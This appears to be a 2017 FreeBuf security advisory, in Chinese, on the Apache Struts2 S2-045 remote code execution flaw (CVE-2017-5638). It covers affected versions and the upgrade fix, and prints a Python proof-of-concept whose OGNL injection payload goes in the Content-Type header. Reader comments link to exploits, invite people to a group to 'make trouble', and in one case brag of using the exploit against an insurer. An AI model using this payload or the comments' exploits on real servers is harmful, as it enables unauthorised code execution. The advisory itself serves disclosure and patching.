apache struts2
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
【漏洞预警】Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638) 漏洞盒子认证厂商2017-03-07共2269174人围观 ,发现 35 个不明物体 漏洞
struts2漏洞截图.png
FreeBuf上次曝Struts 2的漏洞已经是半年多以前的事情了。这次的漏洞又是个RCE远程代码执行漏洞。简单来说,基于Jakarta Multipart解析器进行文件上传时,利用漏洞可进行远程代码执行。 该漏洞由安恒信息Nike Zheng上报。
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。
漏洞编号
CVE-2017-5638
漏洞简介
Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。
实际上在default.properties文件中,struts.multipart.parser的值有两个选择,分别是jakarta和pell(另外原本其实也有第三种选择cos)。其中的jakarta解析器是Struts 2框架的标准组成部分。默认情况下jakarta是启用的,所以该漏洞的严重性需要得到正视。
影响范围
Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10
修复方案
如果你正在使用基于Jakarta的文件上传Multipart解析器,请升级到Apache Struts 2.3.32或2.5.10.1版;或者也可以切换到不同的实现文件上传Multipart解析器。
漏洞盒子流行漏洞检测 与 网藤风险感知 已支持对该漏洞的检测,申请免费使用
漏洞PoC
import requests
import sys
def poc(url):
payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
headers = {}
headers["Content-Type"] = payload
r = requests.get(url, headers=headers)
if "105059592" in r.content:
return True
return False
if __name__ == '__main__':
if len(sys.argv) == 1:
print "python s2-045.py target"
sys.exit()
if poc(sys.argv[1]):
print "vulnerable"
else:
print "not vulnerable"
* 参考来源:Apache,转载请注明来自FreeBuf.COM
漏洞盒子
漏洞盒子
114 篇文章
等级: 7级
||
上一篇:【更新PoC】潜伏11年的Linux内核提权漏洞曝光下一篇:关于Apache Struts2(S2-045)漏洞情况的通报
这些评论亮了
hackyzh (1级)回复
安恒对struts2的研究挺厉害的啊
)15(亮了
maxshell (1级)回复
535114467,群文件里面已经有exp了,poc也出了 大佬们过来搞事
)11(亮了
求Apache Struts 2.3.32下载 回复
求Apache Struts 2.3.32下载地址。
)9(亮了
poc 回复
Poc呢
)8(亮了
就不告诉你 回复
poc http://ge.tt/5OjOU9j2
)8(亮了
发表评论已有 35 条评论
hackyzh (1级) 2017-03-07回复 1楼
安恒对struts2的研究挺厉害的啊
亮了(15)
!!! 2017-03-07回复
@ hackyzh 这是安恒发现的,你这是忽悠人?
亮了(4)
dophc (1级) 2017-03-07回复
@ !!! 貌似真是安恒研究院搞得
亮了(6)
test124 (3级) 2017-03-07回复 2楼
火钳留名
亮了(5)
poc 2017-03-07回复 3楼
Poc呢
亮了(8)
dalao大屌 2017-03-07回复 4楼
没POC都是耍流氓 = =
亮了(4)
求Apache Struts 2.3.32下载 2017-03-07回复 5楼
求Apache Struts 2.3.32下载地址。
亮了(9)
xsser 2017-03-07回复 6楼
两会搞事情呀
亮了(7)
FreeBuf 2017-03-07回复 7楼
转发微博
亮了(4)
anting (3级) 愿用十倍努力换成功一个 2017-03-07回复 8楼
二会别搞事情呀
亮了(5)
我是二货 2017-03-07回复
@ anting +1
亮了(4)
Apache Struts 2.3.32 在哪能下到? 2017-03-07回复 9楼
@ 求Apache Struts 2.3.32下载
亮了(4)
maxshell (1级) 2017-03-07回复 10楼
535114467,群文件里面已经有exp了,poc也出了 大佬们过来搞事
亮了(11)
自律 (5级) 2017-03-07回复
@ maxshell 以get
亮了(2)
cwlohome (1级) 2017-03-07回复
@ maxshell 以进群潜水~
亮了(3)
gtl (1级) 2017-03-07回复 11楼
6666
亮了(3)
就不告诉你 2017-03-07回复 12楼
poc http://ge.tt/5OjOU9j2
亮了(8)
dophc (1级) 2017-03-07回复 13楼
貌似发现了个url,试了下,竟然是root
这就尴尬了
亮了(5)
Apache Struts 2.3.32 在哪能下到? 2017-03-07回复 14楼
Apache Struts 2.3.32 在哪能下到?
亮了(3)
plane636 专栏作者(4级) 2017-03-07回复 15楼
求Apache Struts 2.3.32下载
亮了(4)
VicLevin (1级) 追寻黎明前的黑暗,感受暴风前的宁静 2017-03-07回复 16楼
一大堆大佬正在赶来
亮了(4)
plane636 专栏作者(4级) 2017-03-07回复 17楼
下载地址:https://github.com/apache/struts/releases
亮了(5)
XChen (1级) 2017-03-07回复 18楼
朋友圈都被这个刷屏了
亮了(3)
义水黄沙 2017-03-07回复 19楼
关注下
亮了(0)
豆浆包子 2017-03-08回复 20楼
这货漏洞一个接着一个。
亮了(0)
dawner 专栏作者(9级) 黎明已经过去,黑暗就在眼前! 2017-03-08回复 21楼
我只能说,这帮刷洞为生的人手贼快
亮了(1)
anything24 2017-03-08回复 22楼
https版的命令执行,请叫我雷锋http://www.reg008.com/forum/forum.php?mod=viewthread&tid=9&extra=
亮了(2)
fuck script kiddies 2017-03-08回复 23楼
你们这群script kiddies,过来扫啊,直接ban你们
亮了(3)
Sophone 2017-03-08回复 24楼
2.3.16.3版本没发现这个问题,求大神解释
亮了(0)
遗憾哥 2017-03-08回复 25楼
刚拿EXP试了下中国X寿,发现效果杠杠滴,泡碗面吃饱了准备来搞条大的,你妹的已经堵上了 。。。
亮了(0)
彭雨菲yang 2017-03-09回复 26楼
亮了(0)
TKing 2017-03-09回复 27楼
https://github.com/generalthink/Struts2-S2-045-Problem-Solve
漏洞解决方案
亮了(0)
freedom1027 2017-03-09回复 28楼
亮了(1)
彭菲1027 2017-03-09回复 29楼
亮了(0)
zoonctrl (6级) 该怎么做好信息安全? 2017-12-07回复 30楼
安恒在web上真是数一数二的安全企业,666
亮了(2)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
漏洞盒子
漏洞盒子认证厂商
互联网安全众测平台
114
文章数
4
评论数
最近文章
漏洞预警 | WebLogic WLS核心组件反序列化漏洞(CVE-2018-2893)
2018.07.18
24小时「漏洞饥饿游戏」| 见证各路Dalao角逐巅峰,更有神秘众测项目等你挑战
2018.05.10
【豪华出境游】4.28,漏洞盒子精英白帽团出发喽 | 白帽梦想趴
2018.04.26
浏览更多
相关阅读
Struts2安全漏洞频出 ,多因Apache官方代码编写不严谨Struts2 S2-020在Tomcat 8下的命令执行分析
修饰器(modifier)相关漏洞分析Word漏洞CVE-2017-0199剖析,微软的补丁你装了吗?【更新Beta版固件下载】Netgear多个型号路由器曝远程任意命令注入漏洞,官方提供临时解决方案
特别推荐
关注我们 分享每日精选文章
活动预告
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月
【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月
【首节课仅需1元】挖掘CVE不是梦
已结束
9月
【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank
文章评论